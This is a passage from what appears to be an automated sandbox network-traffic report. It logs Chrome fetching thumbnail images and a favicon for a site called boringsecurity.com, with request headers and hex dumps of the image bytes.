                                                                          Data Ascii: C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("A!1A"Qa2q#BRrb$3Cs4S
                                                                          2023-12-10 16:45:03 UTC4517INData Raw: cf 02 cf d4 4b e7 74 ef b8 7f 08 b1 7e d7 1d be 2d 4a 94 d0 e8 4a b7 a7 ea 0d 5a b5 1e 67 b5 86 04 86 16 95 a4 a9 0b 28 3e 2c 73 1c 0d 65 f5 14 eb 6c 79 ae a3 4f 49 97 3d 84 60 25 d9 51 92 c1 70 f1 dc 41 4a b3 8e 58 ca 72 78 e7 15 56 6d aa 4c 2b 64 5d 40 c1 8b 2e 1b c3 bb 4f 73 de 83 bc f3 04 14 00 54 30 41 00 93 ce ac aa 12 52 4a ce 8a 6f ba 99 41 ba f8 7f 9e c5 b4 6b 56 16 95 cc 71 2e 94 9c 84 25 3b 53 9f 33 e7 59 4a b1 b5 4e f6 e6 dc 25 1b 16 82 01 00 e4 1c 8e 95 7d 5b 15 c6 31 8f 93 a3 32 4d b7 c8 a5 29 53 38 29 4a 50 02 94 a5 00 29 4a 50 02 b3 3a 26 0a 6e 7a d2 c3 09 cf f2 9c 9a da dd f4 6d bf b4 59 fe 54 1a c3 56 df fd 9c 34 d2 27 5e ae 5a 8a 72 01 81 01 95 c3 68 ab 92 9d 58 1d e1 ff 00 6a 30 3f de 6a bb 65 b6 2c 11 a9 6e 17 07 35 fe b7 bc 6a 0b a9
                                                                          Data Ascii: Kt~-JJZg(>,selyOI=`%QpAJXrxVmL+d]@.OsT0ARJoAkVq.%;S3YJN%}[12M)S8)JP)JP:&nzmYTV4'^ZrhXj0?je,n5j


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          212192.168.2.54994552.217.229.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:03 UTC393OUTGET /thumbnail_poppunk_ac3f59a852.jpeg HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:03 UTC377INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 39 42 55 4e 72 73 46 30 4b 78 41 32 44 31 43 74 58 2f 48 2b 76 77 32 30 79 41 55 36 54 68 36 52 74 38 41 6f 6c 53 53 35 4d 4c 71 66 6c 66 33 46 50 56 53 70 75 41 75 47 2f 76 31 65 79 61 58 4a 33 57 59 57 33 6b 34 50 62 47 30 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 46 59 34 51 31 31 36 39 33 4d 42 53 51 39 33 31 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 34 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 32 33 20 53 65 70 20 32 30 32 32 20 30 30 3a 31 39 3a 34 34 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 30 35 33 32 63 33 35 33 62 39 37 66 30 31 36 35 31 63 65 64 34 32
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: 9BUNrsF0KxA2D1CtX/H+vw20yAU6Th6Rt8AolSS5MLqflf3FPVSpuAuG/v1eyaXJ3WYW3k4PbG0=x-amz-request-id: FY4Q11693MBSQ931Date: Sun, 10 Dec 2023 16:45:04 GMTLast-Modified: Fri, 23 Sep 2022 00:19:44 GMTETag: "0532c353b97f01651ced42
                                                                          2023-12-10 16:45:03 UTC4818INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 00 9c 00 9c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 03 05 06 07 04 02 08 ff c4 00 40 10 00 01 03 03 01 05 04 06 08 04 05 05 00 00 00 00 01 00 02 03 04 05 11 21 06 12 31 41 51 07 13 61 71 14 22 32 81 91 b1 23 42 52 72 a1 c1 d1 f0 15 16 33 f1 34 35 43 82 e1 53 62 63 92 a2
                                                                          Data Ascii: C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("@!1AQaq"2#BRr345CSbc


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          213192.168.2.54994652.217.229.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:03 UTC397OUTGET /thumbnail_redzin_temp_1898f990e6.jpeg HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:03 UTC415INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 38 69 6b 70 61 72 42 33 4b 69 56 4d 36 4b 43 4a 4c 50 69 66 2f 53 6f 77 5a 44 59 35 36 67 47 58 59 78 30 6b 47 68 43 48 4a 74 6b 53 59 56 4d 34 4d 56 6c 76 6e 4d 39 44 38 6f 39 39 74 75 6b 37 71 34 4e 73 6e 71 30 6d 74 34 6b 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 46 59 34 56 51 48 41 52 48 33 35 43 54 4d 46 59 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 34 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 32 20 4e 6f 76 20 32 30 32 33 20 32 32 3a 32 30 3a 35 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 62 63 30 34 65 37 32 63 33 32 66 66 65 62 31 64 37 63 65 61 37 38
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: 8ikparB3KiVM6KCJLPif/SowZDY56gGXYx0kGhCHJtkSYVM4MVlvnM9D8o99tuk7q4Nsnq0mt4k=x-amz-request-id: FY4VQHARH35CTMFYDate: Sun, 10 Dec 2023 16:45:04 GMTLast-Modified: Sun, 12 Nov 2023 22:20:50 GMTETag: "bc04e72c32ffeb1d7cea78
                                                                          2023-12-10 16:45:03 UTC5081INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 00 9c 00 9c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 06 07 03 04 05 01 08 02 ff c4 00 4c 10 00 01 03 03 02 04 02 02 0d 06 0b 09 01 00 00 00 01 02 03 04 00 05 11 06 21 07 12 13 31 22 41 14 51 15 32 34 35 61 71 72 73 81 b1 b2 c1 d2 08 16 36 74 75 91 17 23 24 33 52 55 56 92 94
                                                                          Data Ascii: C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("L!1"AQ245aqrs6tu#$3RUV


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          214192.168.2.54994752.217.229.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:03 UTC389OUTGET /thumbnail_quit_b3e92694b1.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:03 UTC377INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 72 63 68 67 4c 64 59 6d 48 61 32 6b 33 6b 4b 4f 50 33 77 58 63 74 5a 4b 35 45 68 57 55 4b 6e 51 72 6b 45 74 68 36 44 6b 56 74 37 70 58 58 54 6d 55 4e 34 65 62 52 2b 65 47 39 4a 59 4e 38 63 49 37 4d 51 6c 43 69 51 36 37 54 49 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 46 59 34 59 4b 52 32 4b 33 37 47 31 32 39 57 45 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 34 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 32 32 20 53 65 70 20 32 30 32 32 20 32 33 3a 35 37 3a 35 37 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 38 32 34 61 38 34 39 38 36 64 37 39 62 30 34 37 32 62 35 61 37 64
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: rchgLdYmHa2k3kKOP3wXctZK5EhWUKnQrkEth6DkVt7pXXTmUN4ebR+eG9JYN8cI7MQlCiQ67TI=x-amz-request-id: FY4YKR2K37G129WEDate: Sun, 10 Dec 2023 16:45:04 GMTLast-Modified: Thu, 22 Sep 2022 23:57:57 GMTETag: "824a84986d79b0472b5a7d
                                                                          2023-12-10 16:45:03 UTC8531INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 06 00 00 00 8a b8 c2 4d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 07 74 54 e7 99 f7 49 1c af 1b 4d 42 80 7a ef bd 4b 33 ea bd 77 d4 91 40 05 49 48 48 a2 37 15 d4 a8 12 bd 77 9b de 3b 18 03 06 37 5c c1 c6 d8 8e 1d db 49 9c c4 29 bb 9b 6c 76 93 cd ee 26 5f d6 ff ef 3c cf cc 1d dd a9 1a 49 23 01 ce 72 ce 7b e6 32 33 9a b9 73 ef ef fe 9f fa be 77 8c b4 b6 ed 87 92 da d6 31 92 9a d6 e7 a4 b5 6d 8b 25 b5 6d 9f 4a 6a 5a 21 ad 6d fb 4e 52 db f6 9d b4 b6 0d c3 1b f4 59 fc 79 a2 47 f9 a8 11 3d 8a b7 87 fd 9d ff b8 43 a2 65 7b 14 07 31 f3 9d a4 a6 95 f8 f9 4c 5a db b6 44 5a db fa ac 94 18 ab 6d fb 21 81 36 46 52 db 6a 21 ad 6d fb 48 22
                                                                          Data Ascii: PNGIHDRMpHYs IDATxtTIMBzK3w@IHH7w;7\I)lv&_<I#r{23sw1m%mJjZ!mNRYyG=Ce{1LZDZm!6FRj!mH"
                                                                          2023-12-10 16:45:04 UTC9000INData Raw: 64 56 5a fa 2c 0a 62 e8 77 91 cf 47 bf 9b ca 7b e1 21 be c8 cb 4e e7 da a9 93 83 1d 5c 52 4a 94 4c a9 c1 f2 6f 86 01 ce 10 33 af 06 09 9d 36 d8 c4 c9 df 99 8b 79 b9 52 4a 5e d2 3c ce e4 84 18 84 06 78 29 f9 71 0a b3 fa de 21 3e 01 54 43 fd 52 25 b0 90 d5 2f 4f 61 4b 67 2d ee 9e eb e5 6e 93 e8 c8 30 ce bd a9 76 fa d2 a0 86 46 52 b8 30 49 20 0f 02 cf cd d5 99 4d e8 df 7f 76 19 ef 5e e8 c3 f2 ea 44 6c 5d 98 8a 83 2b 72 50 93 13 80 28 3f 1b 84 7a 5a 20 33 c2 19 2b 9b 32 f1 de b9 d5 b8 7f 79 23 77 fc 92 ba 89 d5 f6 9b b7 0f 72 69 6a 5a 62 00 3e be b2 8e dd 81 99 d9 52 b8 da 4c 82 b5 e9 04 1e 94 14 ae c9 0d c6 95 83 1d 9c e6 a1 ee 15 02 95 00 23 95 fb e8 e5 ad 8a 8b 29 3b 29 8c 93 d9 02 6c 0e b1 39 4a ed 48 ca ca 26 af 55 8b d6 57 19 ed 55 af 54 56 c0 7c b4 0a
                                                                          Data Ascii: dVZ,bwG{!N\RJLo36yRJ^<x)q!>TCR%/OaKg-n0vFR0I Mv^Dl]+rP(?zZ 3+2y#wrijZb>RL#);)l9JH&UWUTV|
                                                                          2023-12-10 16:45:04 UTC3781INData Raw: 19 74 64 5e 55 a2 d7 d1 53 9f c1 9c 1f c3 98 5f bd 80 d3 3b 85 51 ab 12 78 a8 dd 37 41 bf 1d 15 d4 8d 52 0b 2e 09 d3 f0 dc b3 cf b2 7a 58 5a 5a 2a 4c 96 26 f0 04 d0 94 00 d4 f0 3e 47 47 07 98 9b 5b c0 d8 c8 08 d1 11 12 36 89 aa 77 84 e6 1c 9c 9e 0a 27 2c 84 43 cb 80 bd f0 c2 0b bc af 3a 7d 4d 3b 3b 38 b0 79 9d c0 3e 9d b0 a2 65 3f 70 da 8e d5 48 41 f7 18 29 9c a6 74 c6 80 ef 53 0a 42 f4 df 49 a5 7c 14 4f fc 68 c7 64 5b 27 6e 01 27 87 9c 7c 22 32 89 04 1e 9d 50 b1 8a 29 a0 13 81 a7 04 a0 8a d2 d0 09 17 02 0a 2f 0f 57 c5 fd 57 0b b4 d5 57 f5 b8 97 03 95 be 26 4e 9c c0 9f ab ba 6f 76 b6 2a fb 2a 87 6e e2 84 f1 70 49 2e 92 f9 74 a2 b2 95 f2 09 1e 09 ff 6e b0 50 0e 04 9c 7e 50 0e 5a e1 06 84 4e 29 cd 22 ff c2 1a fd 61 93 6d b7 70 b0 10 50 36 0f 93 a6 98 72 f2
                                                                          Data Ascii: td^US_;Qx7AR.zXZZ*L&>GG[6w',C:}M;;8y>e?pHA)tSBI|Ohd['n'|"2P)/WWW&Nov**npI.tnP~PZN)"ampP6r


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          215192.168.2.54995075.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:03 UTC592OUTGET /favicon.ico HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:04 UTC409INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 35 30 39 33 35 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 35 34 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 76 6e 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 69 63 6f 6e 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 33 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 64 37 66 65 38 61 38 65 65 34 66 39 32
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 50935Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 15406Content-Type: image/vnd.microsoft.iconDate: Sun, 10 Dec 2023 16:45:03 GMTEtag: "d7fe8a8ee4f92
                                                                          2023-12-10 16:45:04 UTC777INData Raw: 00 00 01 00 03 00 10 10 00 00 01 00 20 00 68 04 00 00 36 00 00 00 20 20 00 00 01 00 20 00 28 11 00 00 9e 04 00 00 30 30 00 00 01 00 20 00 68 26 00 00 c6 15 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 01 00 00 00 01 01 00 00 00 00 00 01 00 00 00 00 00 01 00 4c 4d 4d 14 46 47 46 37 4c 47 42 36 51 51 50 13 00 00 01 00 00 01 00 00 00 01 01 00 00 00 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 47 47 41 56 44 45 3e ca 42 40 3b fe 3e 3c 39 ff 3a 39 35 ff 44 43 3f fe 47 47 42 c6 40 41 41 50 00 00 00 00 00 00 01 00 00 00 01 00 01 00 00 00 01 00 00 00 00 00 00 00 40 40 40 08 4c 4b 46 aa 40 3f 3a ff 27 27 23 ff 1d 1d 1a ff 1d 1c 1b ff 1f
                                                                          Data Ascii: h6 (00 h&( LMMFGF7LGB6QQPGGAVDE>B@;><9:95DC?GGB@AAP@@@LKF@?:''#
                                                                          2023-12-10 16:45:04 UTC2372INData Raw: ff 20 23 20 ff 24 26 24 ff 2f 31 2e ff 51 51 4c c3 00 01 01 00 00 00 00 00 7b 74 71 58 50 4c 48 ff 2b 2a 28 ff 2c 2c 2b ff 2e 2d 2b ff 27 26 24 ff 2f 2e 2c ff 4f 4d 49 ff 78 76 71 ff 37 37 34 ff 22 27 23 ff 25 26 25 ff 42 41 3d ff 52 52 4e 4e 00 00 00 00 01 00 00 00 00 00 00 00 79 73 6d ab 40 3f 3a ff 27 27 25 ff 53 50 4d ff 57 53 4f ff 54 52 4e ff 56 55 50 ff 49 48 44 ff 4c 4a 46 ff 23 26 23 ff 40 3f 3b ff 59 57 53 a1 00 00 00 00 00 00 00 00 01 01 00 00 00 00 00 00 9f 9f 9f 08 7c 77 71 ab 4f 4b 47 ff 2e 2f 2c ff 2d 2c 2a ff 29 29 28 ff 28 28 26 ff 26 26 25 ff 2c 2c 2a ff 49 46 43 ff 5b 5a 53 a2 55 55 54 06 00 00 00 00 01 01 01 00 00 00 00 00 00 00 01 00 01 00 01 00 01 00 00 00 8b 85 80 56 74 6f 69 ca 57 54 4f fe 49 46 42 ff 45 43 3f ff 50 4d 49 fe 61 5d
                                                                          Data Ascii: # $&$/1.QQL{tqXPLH+*(,,+.-+'&$/.,OMIxvq774"'#%&%BA=RRNNysm@?:''%SPMWSOTRNVUPIHDLJF#&#@?;YWS|wqOKG./,-,*))(((&&&%,,*IFC[ZSUUTVtoiWTOIFBEC?PMIa]
                                                                          2023-12-10 16:45:04 UTC538INData Raw: 80 59 54 4f ff 30 2f 2c ff 24 25 21 ff 25 25 21 ff 22 22 20 ff 22 23 20 ff 22 23 20 ff 20 20 1d ff 32 32 2e ff 8b 88 82 ff 8e 8b 87 ff 8d 8a 85 ff 9f 9c 96 ff 9b 97 93 ff 9e 9b 97 ff 94 91 8d ff 94 92 8e ff a0 9e 9b ff 56 58 57 ff 21 23 20 ff 23 25 22 ff 21 23 21 ff 21 22 20 ff 22 25 23 ff 22 26 24 ff 24 27 26 ff 38 38 35 ff 48 49 44 ff 50 53 4e 6c 00 00 00 00 00 00 00 00 74 6e 66 80 57 53 4f ff 32 32 2f ff 29 28 25 ff 26 27 23 ff 24 24 21 ff 23 24 21 ff 22 23 20 ff 20 20 1e ff 22 23 20 ff 88 84 7f ff 8e 8a 84 ff 94 91 8c ff a8 a4 a0 ff 9c 99 93 ff a0 9d 98 ff 9e 9b 97 ff af aa a7 ff aa a8 a4 ff 87 86 85 ff 1d 1f 1d ff 21 23 20 ff 21 22 20 ff 20 22 20 ff 21 24 22 ff 25 27 25 ff 25 28 26 ff 38 38 36 ff 4c 4c 48 ff 5c 5c 5a 6c 00 00 00 00 00 00 00 00 81 7a
                                                                          Data Ascii: YTO0/,$%!%%!"" "# "# 22.VXW!# #%"!#!!" "%#"&$$'&885HIDPSNltnfWSO22/)(%&'#$$!#$!"# "# !# !" " !$"%'%%(&886LLH\\Zlz
                                                                          2023-12-10 16:45:04 UTC4744INData Raw: 2a 28 ff 2c 2a 28 ff 27 27 24 ff 48 47 44 ff b0 ab a7 ff ac a8 a3 ff a2 9d 99 ff 2e 2e 2c ff 79 75 71 ff 9a 96 91 ff 9f 9c 98 ff 95 92 8d ff 77 75 72 ff 2b 2e 2c ff 20 22 1f ff 21 23 20 ff 22 25 22 ff 23 26 23 ff 26 28 27 ff 27 29 28 ff 50 4f 4a ff 4e 4d 49 f7 60 60 60 08 00 00 00 00 00 00 00 00 00 00 00 00 7d 77 71 cb 6b 66 61 ff 20 21 20 ff 2c 2b 28 ff 29 28 26 ff 2a 29 27 ff 2a 29 27 ff 27 28 25 ff 26 26 22 ff 28 28 25 ff 47 46 44 ff 6e 6c 69 ff 34 34 31 ff 47 44 40 ff 6b 68 64 ff 82 80 7d ff 84 82 81 ff 78 75 70 ff 79 76 70 ff 4f 4f 4d ff 1f 21 1f ff 21 22 21 ff 25 26 24 ff 23 25 23 ff 28 2a 28 ff 2c 2d 2b ff 4f 4e 4a ff 5e 5e 5a b6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 85 81 6d 69 62 5d ff 3c 3b 38 ff 2a 2a 28 ff 2f 2e 2b ff 2d 2c 2a ff
                                                                          Data Ascii: *(,*(''$HGD..,yuqwur+., "!# "%"#&#&('')(POJNMI```}wqkfa ! ,+()(&*)'*)''(%&&"((%GFDnli441GD@khd}xupyvpOOM!!"!%&$#%#(*(,-+ONJ^^Zmib]<;8**(/.+-,*
                                                                          2023-12-10 16:45:04 UTC5930INData Raw: 22 20 ff 1f 21 1e ff 20 22 20 ff 22 23 21 ff 23 25 23 ff 24 26 25 ff 23 27 25 ff 24 26 25 ff 43 43 3f ff 4c 4d 49 ff 47 49 44 fa 59 59 57 78 80 80 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 5d 55 21 58 53 4d da 4f 4b 45 ff 57 55 50 ff 26 26 21 ff 1e 1f 1c ff 1f 20 1d ff 1f 20 1d ff 1f 20 1d ff 20 21 1e ff 20 20 1f ff 21 22 1f ff 68 64 61 ff 45 44 41 ff 26 26 23 ff 25 25 22 ff 38 39 36 ff 3e 3f 3c ff 20 20 1e ff 1f 20 1d ff 1f 20 1e ff 1f 20 1e ff 22 22 20 ff 52 4f 4b ff 41 41 3e ff 41 42 3f ff 39 38 35 ff 20 22 20 ff 1f 21 1f ff 1f 21 1e ff 1f 22 1f ff 20 22 1f ff 22 24 22 ff 27 29 27 ff 27 29 28 ff 25 28 26 ff 25 28 27 ff 2c 2e 2a ff 5a 5a 55 ff 46 47 44 ff 53 53 50 c5 60 60 60 18 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii: " ! " "#!#%#$&%#'%$&%CC?LMIGIDYYWxd]U!XSMOKEWUP&&! ! !"hdaEDA&&#%%"896>?< "" ROKAA>AB?985 " !!" ""$"')'')(%(&%(',.*ZZUFGDSSP```
                                                                          2023-12-10 16:45:04 UTC1045INData Raw: 9d 99 94 8b 75 9e 9e 9a 3f 80 80 80 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00
                                                                          Data Ascii: u?


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          216192.168.2.54994852.217.229.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:03 UTC404OUTGET /thumbnail_5_F_Ry_lya_400x400_c386fc238e.jpeg HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:03 UTC377INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 72 4c 4d 30 5a 6f 2f 30 47 30 52 70 4f 4d 79 2f 32 6e 50 79 5a 42 30 79 5a 73 59 65 35 38 32 75 41 72 35 63 76 6b 54 68 57 52 6f 4d 56 72 4d 48 31 6f 4d 68 4e 67 4d 66 64 37 56 57 77 6f 6a 68 54 45 65 79 36 6d 36 53 31 73 73 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 46 59 34 47 4a 41 4a 35 59 42 5a 53 57 36 38 37 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 34 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 32 33 20 53 65 70 20 32 30 32 32 20 30 30 3a 31 36 3a 35 31 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 64 30 65 63 66 62 35 30 66 62 35 35 31 30 34 36 37 36 62 35 66 66
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: rLM0Zo/0G0RpOMy/2nPyZB0yZsYe582uAr5cvkThWRoMVrMH1oMhNgMfd7VWwojhTEey6m6S1ss=x-amz-request-id: FY4GJAJ5YBZSW687Date: Sun, 10 Dec 2023 16:45:04 GMTLast-Modified: Fri, 23 Sep 2022 00:16:51 GMTETag: "d0ecfb50fb55104676b5ff
